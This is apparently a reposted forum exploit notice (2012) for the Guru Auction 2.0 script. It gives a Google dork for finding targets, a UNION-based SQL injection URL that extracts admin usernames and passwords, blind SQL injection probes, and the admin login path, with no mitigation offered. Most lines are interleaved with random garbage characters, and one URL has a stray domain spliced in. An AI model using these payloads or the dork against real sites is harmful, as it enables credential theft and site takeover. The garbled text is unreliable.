Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
8 M. h3 e# g5 u n
% ?, z- U( y" K; T. D! [作者 : v3n0m' d6 _' Q- X% e
应用 : Guru Auction 2.0
) `. N& E: e) C4 {* JPrice : $49; @5 B7 [) Q. o; `$ M0 E+ F0 m
Vendor : http://www.guruscript.com/
/ f! d, k2 X2 q {, A5 uGoogle Dork : inurl:subcat.php?cate_id=
' p8 _: r; P" Q$ S! [: p( y: ^ 6 I7 ~/ A7 p6 R/ R( D0 S" T* N
SQLi p0c:. ], f4 b) b* m4 { g. U' V
~~~~~~~~~~9 k! _ `9 H( ?0 l+ h% R% e
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
4 A* _( h% I) Z+ c. f; g 2 h& y1 d# r( S7 p4 b' x N
6 U( E; K9 e% l( e# K" R# D盲注 p0c:
' w- \* s$ r- E8 o~~~~~~~~~~1 ^. d6 Q$ b7 A- b
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true9 y* w8 u3 E( [% L
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
! o" K1 G, J' s/ H. U; X+ Z, @0 Z
4 F4 W. b; i3 [! w; ?2 t) U% K管理登录入口:
! z7 _. _( i# r" ~0 P4 O~~~~~~~~~~8 z" H; k) S# A1 ?$ J5 W1 M
http://domain.tld/[path]/admin/( p3 R) L7 x* o8 T9 s; H& l- Y
|
发表于 2012-12-31 09:24:05
收藏
支持
反对